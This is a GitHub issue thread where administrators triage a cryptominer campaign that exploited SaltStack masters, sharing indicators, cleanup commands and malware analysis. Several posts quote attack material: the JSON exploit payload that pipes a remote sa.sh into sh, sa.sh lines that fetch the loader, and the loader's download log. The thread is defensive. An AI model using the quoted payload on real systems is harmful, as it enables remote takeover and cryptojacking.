Closed: xiaopanggege closed this issue 4 years ago
I have the same issue.
salt-minion -V
Salt Version:
    Salt: 3000.1

Dependency Versions:
    cffi: Not Installed
    cherrypy: Not Installed
    dateutil: 2.7.3
    docker-py: Not Installed
    gitdb: Not Installed
    gitpython: Not Installed
    Jinja2: 2.10
    libgit2: Not Installed
    M2Crypto: Not Installed
    Mako: Not Installed
    msgpack-pure: Not Installed
    msgpack-python: 0.5.6
    mysql-python: Not Installed
    pycparser: Not Installed
    pycrypto: 2.6.1
    pycryptodome: Not Installed
    pygit2: Not Installed
    Python: 3.7.3 (default, Dec 20 2019, 18:57:59)
    python-gnupg: Not Installed
    PyYAML: 3.13
    PyZMQ: 17.1.2
    smmap: Not Installed
    timelib: Not Installed
    Tornado: 4.5.3
    ZMQ: 4.3.1

System Versions:
    dist: debian 10.3
    locale: UTF-8
    machine: x86_64
    release: 4.19.0-8-cloud-amd64
    system: Linux
    version: debian 10.3

lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster
Gents, this is an attack.
Check your firewalls. We've had all firewalls disabled on more than 20 systems. Still working to find out more about the issue.
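For anyone triaging, a quick way to check whether the host firewall really got wiped (a sketch; assumes iptables, ufw, or firewalld, so adapt to your distro):
# an empty or ACCEPT-only rule set on a box that normally has rules is suspicious
iptables -S
ufw status verbose 2>/dev/null
systemctl status firewalld 2>/dev/null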
Appears to be related to CVE-2020-11651 and CVE-2020-11652. A backdoor was also installed via the exploit to /var/tmp/salt-store.
Additional context for those not in the loop can be seen here: https://gbhackers.com/saltstack-salt/
F
Maybe it is CVE-2020-11651 and CVE-2020-11652, because my salt-master is reachable from the public internet.
Our entire system is being taken down by this. Can anyone tell us the immediate fix, please?
sudo salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This did at least something for me
I've also managed to strace "salt-minions" and got an IP; I guess it's the attacker's host.
clock_gettime(CLOCK_REALTIME, {1588474770, 745058278}) = 0
clock_gettime(CLOCK_REALTIME, {1588474770, 745079132}) = 0
epoll_wait(6, {}, 1024, 162) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976451307}) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976489118}) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976516591}) = 0
futex(0x9c4384, FUTEX_WAKE_OP_PRIVATE, 1, 1, 0x9c4380, {FUTEX_OP_SET, 0, FUTEX_OP_CMP_GT, 1}) = 1
futex(0x9c4340, FUTEX_WAKE_PRIVATE, 1) = 1
epoll_wait(6, {{EPOLLIN, {u32=9, u64=9}}}, 1024, 338) = 1
clock_gettime(CLOCK_MONOTONIC, {28866503, 976644019}) = 0
read(9, "\1\0\0\0\0\0\0\0", 1024) = 8
clock_gettime(CLOCK_MONOTONIC, {28866503, 976722525}) = 0
socket(PF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 89
setsockopt(89, SOL_TCP, TCP_NODELAY, [1], 4) = 0
setsockopt(89, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0
setsockopt(89, SOL_TCP, TCP_KEEPIDLE, [60], 4) = 0
connect(89, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("193.33.87.231")}, 16) = -1 EINPROGRESS (Operation now in progress)
clock_gettime(CLOCK_MONOTONIC, {28866503, 976922034}) = 0
epoll_ctl(6, EPOLL_CTL_ADD, 89, {EPOLLOUT, {u32=89, u64=89}}) = 0
epoll_wait(6, {}, 1024, 338) = 0
clock_gettime(CLOCK_MONOTONIC, {28866504, 315460999}) = 0
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
193.33.87.231
Russian IP. I saw an example out there that was an AWS server (52.8.126.80).
A scan revealed over 6,000 instances of this service exposed to the public Internet. Getting all of these installs updated may prove a challenge as we expect that not all have been configured to automatically update the salt software packages.
To aid in detecting attacks against vulnerable salt masters, the following information is provided.
Exploitation of the authentication vulnerabilities will result in the ASCII strings "_prep_auth_info" or "_send_pub" appearing in data sent to the request server port (default 4506). These strings should not appear in normal, benign, traffic.
Published messages to minions are called "jobs" and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job ids ("jids") that look out of the ordinary. Lack of suspicious jobs should not be interpreted as absence of exploitation however.
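A minimal audit sketch based on the note above, assuming the default job cache path; the job data is serialized, so grep it as binary, and remember that no hits does not mean no exploitation:
# indicators seen in this campaign: the loader script, its host IP, and the dropped binary name
grep -r -a -l -e 'salt-store' -e 'sa.sh' -e '217.12.210.192' /var/cache/salt/master/jobs/ 2>/dev/null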
Seems like it's better to stop salt-masters for a while
Stopping salt masters does not stop the processes from running. Also, can we expect that the exploiters have had root access to every minion?
Been affected :(. We stopped all Salt masters and ran the following:
kill -9 $(pgrep salt-minion)
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm /tmp/salt-minions
rm /var/tmp/salt-store
Not sure if this is enough at the moment
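A hedged follow-up sketch for checking the persistence spots this campaign reportedly touches (crontabs, authorized_keys, ld.so.preload, sysctl):
crontab -l -u root
ls -la /var/spool/cron/ /var/spool/cron/crontabs/ 2>/dev/null
lsattr /root/.ssh/authorized_keys /etc/ld.so.preload 2>/dev/null
grep -n 'nmi_watchdog\|nr_hugepages' /etc/sysctl.conf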
YOU MUST UPDATE YOUR MASTER(S) IMMEDIATELY
Important references:
- https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf
- https://docs.saltstack.com/en/latest/topics/releases/3000.2.html
- https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/
Disconnect them from the internet ASAP, perform the necessary updates. There are also backports for older versions of Salt:
- "There are also now official 2016.x and 2017.x patches provided by SaltStack via the same location as the other patches."
Seems the attack started a couple of hours ago. I would add:
We got the same issue and followed the steps above, which remediated it. Thank you all for sharing the solution.
In our case, one job was executed that did the following on each server, according to the logs:
Firewall stopped and disabled on system startup
kernel.nmi_watchdog = 0
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys
grep: Trailing backslash
grep: write error: Broken pipe
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
sh: 484: docker: not found
sh: 485: docker: not found
sh: 486: docker: not found
sh: 487: docker: not found
sh: 488: docker: not found
sh: 489: docker: not found
sh: 490: docker: not found
sh: 491: docker: not found
sh: 492: docker: not found
sh: 493: docker: not found
sh: 494: docker: not found
sh: 495: docker: not found
sh: 496: docker: not found
sh: 497: docker: not found
sh: 498: docker: not found
sh: 499: docker: not found
sh: 500: docker: not found
sh: 501: docker: not found
sh: 502: docker: not found
sh: 503: docker: not found
sh: 504: docker: not found
sh: 505: docker: not found
sh: 506: setenforce: not found
apparmor.service is not a native service, redirecting to systemd-sysv-install
Executing /lib/systemd/systemd-sysv-install disable apparmor
insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S).
insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty).
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to execute operation: No such file or directory
P NOT EXISTS
md5sum: /var/tmp/salt-store: No such file or directory
salt-store wrong
--2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store
Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ...
Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16687104 (16M) [application/octet-stream]
Saving to: '/var/tmp/salt-store'
2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104]
8ec3385e20d6d9a88bc95831783beaeb
salt-store OK
salt-minions -> https://github.com/xmrig/xmrig
Same thing on my servers.
Any compromised minion is toast I'm guessing. /tmp/salt-minions is just compiled xmrig? Anyone have any hints for cleanup?
[root@xiaopgg_2 ~]# /tmp/salt-minions -h
Usage: xmrig [OPTIONS]

Network:
  -o, --url=URL       URL of mining server
  -a, --algo=ALGO     mining algorithm https://xmrig.com/docs/algorithms
We are investigating salt-store (loader: hxxp://217.12.210.192/salt-store, hxxps://bitbucket.org/samk12dd/git/raw/master/salt-store) and you should do the same, not the salt-minions (miner)!
VT salt-store: https://www.virustotal.com/gui/file/9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc/detection
What we know right now:
- (!) Firewall rules cleaned up, stopped and disabled
- (!) Changes are made to /var/spool/cron/root
- Hardcoded IP 193.33.87.231 should be blocked on all servers via iptables/firewalld (see the sketch after this comment)
- NMI watchdog is disabled via sysctl
- AppArmor is disabled as well
- Nginx is stopped
- Tries to brute-force Redis (redis_brH9, main.redisBrute)
- The loader matches https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/ https://gyazo.com/d5b8e2df6838ab452fc8a51374dd3a86

minions:
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
master:
yum update salt-master
systemctl restart salt-master
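A sketch for the blocking step above, using either plain iptables or firewalld:
iptables -I OUTPUT -d 193.33.87.231 -j DROP
iptables -I INPUT -s 193.33.87.231 -j DROP
# or, with firewalld:
firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="193.33.87.231" drop'
firewall-cmd --reload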
We have the same problem; the program shut down all of our services, including nginx and redis.
It enables hugepages.
Probably wise to change your passwords if you've been logging into root.
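A hedged check/reset for the hugepages change (assumes you don't use hugepages yourself; vm.nr_hugepages=0 is the usual default):
sysctl vm.nr_hugepages
grep -n 'nr_hugepages' /etc/sysctl.conf
sysctl -w vm.nr_hugepages=0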
Here's what my salt-store tried to run:
/usr/sbin/sh -c pkill -f salt-minions
/usr/sbin/sh -c chmod +x /tmp/salt-minions
/usr/sbin/sh -c /tmp/salt-minions &
(The last 2 lines execute in a loop until it can detect the miner is running)
Method of detection: spun up a docker container, replaced /bin/sh
with a script which logs all run commands to a tmpfile.
Dockerfile:
# Minimal sandbox image: copy in the sample plus the logging wrapper, and keep a
# pristine copy of /bin/sh at /bin/shh so the wrapper can hand off to it.
FROM archlinux
ADD salt-store .
ADD hello.sh .
RUN chmod +x salt-store
RUN chmod +x hello.sh
RUN cp /bin/sh /bin/shh
CMD /bin/bash
hello.sh:
#!/bin/bash
# Log every invocation (program name plus all arguments), then hand the call off
# to the saved copy of the real shell so behaviour is otherwise unchanged.
/bin/echo "$0 $*" >> /log.txt
exec /bin/shh "$@"
Build container, spin up, run "mv /hello.sh /bin/sh", run "./salt-store", wait 2 minutes, cat log.txt
salt-store also auto-downloads the salt-minions binary to /tmp/salt-minions. The download isn't done by a shell script; salt-store is a Go binary and uses Go's built-in HTTP support.
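Roughly the same steps as commands (a sketch; the image tag is arbitrary, and this should only be done on an isolated, disposable host since the sample is live malware):
docker build -t salt-store-sandbox .
docker run --rm -it salt-store-sandbox
# inside the container:
mv /hello.sh /bin/sh
./salt-store &
sleep 120
cat /log.txt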
It also stopped and disabled the Docker services. I spent a few moments thinking the Docker ports had stopped working because of the disabled firewall rules, and was trying to configure iptables forwarding before noticing Docker itself was disabled. :facepalm:
Yes. It stops Confluence, webservers, aliyun, redis, docker, basically anything CPU-intensive, so the attacker can steal all your resources for the miner :)
Also creates/modifies /etc/selinux/config to:
SELINUX=disabled
Modifies /root/.wget-hsts as well
Modifies root's crontab /var/spool/cron/crontabs/root (in my case with no suspicious entries)
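A hedged cleanup sketch for the files above: restore the SELinux config (takes effect after a reboot) and eyeball root's crontab and the wget HSTS cache for anything you didn't put there:
grep -n '^SELINUX=' /etc/selinux/config
sed -i 's/^SELINUX=disabled/SELINUX=enforcing/' /etc/selinux/config
crontab -l -u root
cat /root/.wget-hsts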
I've reported the bitbucket repo to atlassian as a malware distribution point.
Also found file /etc/salt/minion.d/_schedule.conf
schedule:
__mine_interval: {enabled: true, function: mine.update, jid_include: true, maxrunning: 2,
minutes: 60, return_job: false, run_on_start: true}
But I found that this file is generated by the Salt minion itself, so never mind.
I got hit a few hours ago and they hit a host with snoopy running if anyone is interested in what commands they're running in their payload. Looks like they also knock out /var/log/syslog, set kernel.nmi_watchdog=0 in /etc/sysctl.conf, and disable apparmor in systemd.
Edit: Still going through the lines, but it looks like they also knock out ufw and flush all the chains
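A sketch to undo those specific changes on Debian/Ubuntu-style hosts (re-enable AppArmor and ufw, restore the watchdog setting); treat it as a starting point, not a full cleanup:
systemctl enable --now apparmor
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
sysctl -w kernel.nmi_watchdog=1
ufw enable
ufw status verbose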
@justinimn you are a godsend. Thank you!
Update: Was able to search some of the strings from the snoopy output.
Here:
https://xorl.wordpress.com/2017/12/13/the-kworker-linux-cryptominer-malware/
@taigrr My pleasure
Funny, they even clean the system of any other miners if running. :smile:
@Avasz Hey can't leave any coins on the table right lol
Except they just delete the wallets instead of trying to take them. /shrug
loader: hxxp://217.12.210.192/salt-store
Seems to be a Ukrainian IP, related to ITLDC.
It is not pingable any more, and I cannot curl -s 217.12.210.192/sa.sh
So I suppose that at least one point of attack was disabled (by itldc or someone else)
Checked ping from 191 different IPs, no ping
@aTastyCookie did you get a copy of 217.12.210.192/sa.sh? We need it to dig into its behavior.
Bunch more IPs: 144.217.129.111 185.17.123.206 185.221.153.85 185.255.178.195 91.215.152.69
salt-store IPs I see mentioned:
252.5.4.32
5.4.52.5
4.62.5.4
72.5.4.82
0.0.0.0
2.5.4.102
5.4.112.5
127.0.0.1
47.65.90.240
185.61.7.8
67.205.161.58
104.248.3.165
1.4.1.1
1.4.1.1
1.4.3.1
1.4.4.1
1.4.6.1
1.4.7.1
1.4.8.1
1.4.9.1
1.4.9.1
1.4.10.1
1.4.11.1
1.4.12.1
1.4.12.1
1.4.13.1
1.4.14.1
1.4.14.1
1.4.14.2
1.4.14.2
1.2.1.1
1.2.2.1
1.2.3.1
1.2.3.1
1.2.4.1
1.2.4.1
1.2.6.1
1.2.8.1
1.1.1.1
1.1.1.1
1.1.1.1
1.1.2.1
1.1.3.1
1.1.3.1
1.2.1.1
1.2.2.1
1.2.2.1
(Note: this list was generated with strings salt-store | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
104.248.4.162
107.174.47.156
107.174.47.181
108.174.197.76
121.42.151.137
140.82.52.87
144.217.45.45
158.69.133.18
176.31.6.16
181.214.87.241
185.181.10.234
185.193.127.115
185.71.65.238
188.209.49.54
192.236.161.6
200.68.17.196
217.12.210.192
3.215.110.66
45.76.122.92
46.243.253.15
51.15.56.161
51.38.191.178
51.38.203.146
83.220.169.247
88.99.242.92
89.35.39.78
In case these help, these are from the sa.sh file:
$WGET $DIR/salt-store http://217.12.210.192/salt-store
crontab -l | sed '/185.181.10.234/d' | crontab -
crontab -l | sed '/3.215.110.66.one/d' | crontab -
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pkill -f 121.42.151.137
pkill -f 185.193.127.115
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
Contacted the abuse team for 193.33.87.231
(by chance we're hosted by the same company that owns this AS), it's one of their clients and they're looking into it.
My bet it's a hacked VPS.
Can we see who added this repo? https://bitbucket.org/samk12dd/git/src/master/
@onewesong I contacted atlassian over 2 hours ago. Will report back once they respond. So far, nothing.
Edit: 9 hours later and still no response.
Edit: 13 hours. Sheesh. Guess I won't hear back until Monday.
I can confirm this is being delivered via the new CVE, exploiting exposed port 4506 on Salt masters.
{
"enc": "clear",
"load": {
"arg": [
"(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"
],
"cmd": "_send_pub",
"fun": "cmd.run",
"jid": "15884696218711903731",
"kwargs": {
"show_jid": false,
"show_timeout": true
},
"ret": "",
"tgt": "*",
"tgt_type": "glob",
"user": "root"
}
}
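A hedged way to watch for this on the wire, per the detection note further up (the two exploit strings should not appear in benign traffic to the request port):
tcpdump -l -A -i any 'tcp port 4506' | grep --line-buffered -e '_prep_auth_info' -e '_send_pub'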
This thread has been amazing - my monitoring was going crazy; Slack messages, text messages, emails - it was screaming for help. Thanks to you guys, I've been successful in (1) upgrading my salt-master (I was on a 2018 version) and (2) identifying that it's the same issue I was plagued with. So thank you very much for the information thus far.
I'm nowhere near the sysadmin that you guys are, but I have 17 servers that were affected. If there's anything I can dig up to help the investigation just let me know and I'd be more than happy to pitch in with data.
Additionally, I'm in AWS with everything. Right now 4505 and 4506 are both open to the world; I'm guessing that despite upgrading Salt, these ports should be closed to the world. Is it only the minions that need access to them, or is there something else that needs access too?
Now I'm off to figure out how to upgrade the minions on the servers.
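On the ports question: only your minions need to reach the master's 4505 (publish) and 4506 (request) ports, so in AWS the security group can be locked down to your minions' source ranges. A rough iptables equivalent (the CIDR is a placeholder, replace it with your own):
iptables -A INPUT -p tcp -m multiport --dports 4505,4506 -s 10.0.0.0/16 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dports 4505,4506 -j DROP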
@jblac Don't trust a compromised system. Reinstall is the only safe thing.
Description: An unknown program suddenly started running today on all of my servers that have salt-minion installed: /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39,  3 users,  load average: 2.01, 2.02, 1.91
Tasks: 193 total,   1 running, 192 sleeping,   0 stopped,   0 zombie
Cpu(s):  7.2%us, 18.3%sy,  0.0%ni, 74.1%id,  0.4%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   8060948k total,  7502768k used,   558180k free,    76316k buffers
Swap:  4194300k total,   437368k used,  3756932k free,   188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef | grep 27061 | grep -v grep
root     27061     1 89 09:26 ?        00:36:37 /tmp/salt-minions
salt-minion version: 2018.3.2; system: CentOS release 6.5 (Final)